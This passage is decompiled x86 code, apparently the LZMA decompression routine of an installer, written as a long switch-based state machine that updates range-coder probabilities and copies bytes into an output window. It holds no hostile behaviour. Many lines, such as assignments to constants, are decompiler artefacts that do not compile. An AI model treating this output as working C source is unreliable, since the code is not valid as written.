											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            												goto L39;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												L45:
                                                                                                                                                                                                                            												goto L37;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 0xe:
                                                                                                                                                                                                                            											L46:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												L160:
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L47:
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t156 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t156;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												L48:
                                                                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                                                                            													break;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L49:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__edx = __ebx + __ebx;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                                                                            													_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                                            													__ebx = _t170;
                                                                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													L53:
                                                                                                                                                                                                                            													goto L46;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L54:
                                                                                                                                                                                                                            											_t173 = __ebp - 0x34;
                                                                                                                                                                                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                                            											__eflags =  *_t173;
                                                                                                                                                                                                                            											goto L55;
                                                                                                                                                                                                                            										case 0xf:
                                                                                                                                                                                                                            											L58:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												L161:
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L59:
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t203 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t203;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											L60:
                                                                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                                                                            												L55:
                                                                                                                                                                                                                            												__al =  *(__ebp - 0x44);
                                                                                                                                                                                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                                            												goto L56;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L61:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__edx = __ebx + __ebx;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            											__esi = __edx + __eax;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                                                                            												_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                                            												__ebx = _t217;
                                                                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            												0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            												goto L60;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 0x10:
                                                                                                                                                                                                                            											L109:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												L165:
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L110:
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t365 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t365;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											goto L111;
                                                                                                                                                                                                                            										case 0x11:
                                                                                                                                                                                                                            											L69:
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                                                            											goto L132;
                                                                                                                                                                                                                            										case 0x12:
                                                                                                                                                                                                                            											L128:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												L131:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                                            												L132:
                                                                                                                                                                                                                            												 *(_t644 - 0x54) = _t642;
                                                                                                                                                                                                                            												goto L133;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L129:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            											__eflags = __eax;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                                            											goto L130;
                                                                                                                                                                                                                            										case 0x13:
                                                                                                                                                                                                                            											L141:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												L143:
                                                                                                                                                                                                                            												_t469 = __ebp - 0x58;
                                                                                                                                                                                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                                            												__eflags =  *_t469;
                                                                                                                                                                                                                            												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                                            												L144:
                                                                                                                                                                                                                            												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                                                                                                                                                            												L145:
                                                                                                                                                                                                                            												 *(_t644 - 0x50) = 1;
                                                                                                                                                                                                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                                                                            												goto L149;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L142:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            											 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                                            											L130:
                                                                                                                                                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            											 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                                            											goto L144;
                                                                                                                                                                                                                            										case 0x14:
                                                                                                                                                                                                                            											L156:
                                                                                                                                                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												L140:
                                                                                                                                                                                                                            												 *(_t644 - 0x88) = _t537;
                                                                                                                                                                                                                            												goto L1;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 0x15:
                                                                                                                                                                                                                            											L91:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            											__al = __al & 0x000000fd;
                                                                                                                                                                                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            											goto L120;
                                                                                                                                                                                                                            										case 0x16:
                                                                                                                                                                                                                            											goto L0;
                                                                                                                                                                                                                            										case 0x17:
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												L145:
                                                                                                                                                                                                                            												 *(_t644 - 0x50) = 1;
                                                                                                                                                                                                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                                                                            												goto L149;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 0x18:
                                                                                                                                                                                                                            											goto L146;
                                                                                                                                                                                                                            										case 0x19:
                                                                                                                                                                                                                            											L94:
                                                                                                                                                                                                                            											__eflags = __ebx - 4;
                                                                                                                                                                                                                            											if(__ebx < 4) {
                                                                                                                                                                                                                            												L98:
                                                                                                                                                                                                                            												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                                            												L119:
                                                                                                                                                                                                                            												_t393 = __ebp - 0x2c;
                                                                                                                                                                                                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t393;
                                                                                                                                                                                                                            												L120:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												if(__eax == 0) {
                                                                                                                                                                                                                            													L166:
                                                                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L121:
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                                            													goto L171;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L122:
                                                                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            												_t400 = __ebp - 0x60;
                                                                                                                                                                                                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                                            												__eflags =  *_t400;
                                                                                                                                                                                                                            												goto L123;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L95:
                                                                                                                                                                                                                            											__ecx = __ebx;
                                                                                                                                                                                                                            											__eax = __ebx;
                                                                                                                                                                                                                            											__ecx = __ebx >> 1;
                                                                                                                                                                                                                            											__eax = __ebx & 0x00000001;
                                                                                                                                                                                                                            											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                                            											__al = __al | 0x00000002;
                                                                                                                                                                                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                                            											__eflags = __ebx - 0xe;
                                                                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            											if(__ebx >= 0xe) {
                                                                                                                                                                                                                            												L97:
                                                                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                                                                            												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                                            												L102:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            													L107:
                                                                                                                                                                                                                            													__eax = __eax + __ebx;
                                                                                                                                                                                                                            													 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                                            													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													L108:
                                                                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            													 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                                            													 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                                            													L112:
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            														L118:
                                                                                                                                                                                                                            														_t391 = __ebp - 0x2c;
                                                                                                                                                                                                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                                            														__eflags =  *_t391;
                                                                                                                                                                                                                            														goto L119;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													L113:
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            													__esi = __edi + __eax;
                                                                                                                                                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            													__ax =  *__esi;
                                                                                                                                                                                                                            													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                                                            														__ecx = 0;
                                                                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                                                            														__ecx = 1;
                                                                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            														__ebx = 1;
                                                                                                                                                                                                                            														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                                                            														__ebx = 1 << __cl;
                                                                                                                                                                                                                            														__ecx = 1 << __cl;
                                                                                                                                                                                                                            														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                                                            														__cx = __ax;
                                                                                                                                                                                                                            														__cx = __ax >> 5;
                                                                                                                                                                                                                            														__eax = __eax - __ecx;
                                                                                                                                                                                                                            														__edi = __edi + 1;
                                                                                                                                                                                                                            														__eflags = __edi;
                                                                                                                                                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            														 *__esi = __ax;
                                                                                                                                                                                                                            														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                                                            														0x800 = 0x800 - __ecx;
                                                                                                                                                                                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            														 *__esi = __dx;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            														L111:
                                                                                                                                                                                                                            														_t368 = __ebp - 0x48;
                                                                                                                                                                                                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                                                            														__eflags =  *_t368;
                                                                                                                                                                                                                            														goto L112;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														L117:
                                                                                                                                                                                                                            														goto L109;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L103:
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            													__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                                            													__eflags = __ebx;
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													L101:
                                                                                                                                                                                                                            													_t338 = __ebp - 0x48;
                                                                                                                                                                                                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            													__eflags =  *_t338;
                                                                                                                                                                                                                            													goto L102;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													L106:
                                                                                                                                                                                                                            													goto L99;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L96:
                                                                                                                                                                                                                            											__edx =  *(__ebp - 4);
                                                                                                                                                                                                                            											__eax = __eax - __ebx;
                                                                                                                                                                                                                            											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                                                            											goto L108;
                                                                                                                                                                                                                            										case 0x1a:
                                                                                                                                                                                                                            											L56:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            												L162:
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L57:
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                                                            											__al =  *(__ebp - 0x5c);
                                                                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                                                            											__eax = __ecx + 1;
                                                                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__edx = _t192;
                                                                                                                                                                                                                            											goto L80;
                                                                                                                                                                                                                            										case 0x1b:
                                                                                                                                                                                                                            											L76:
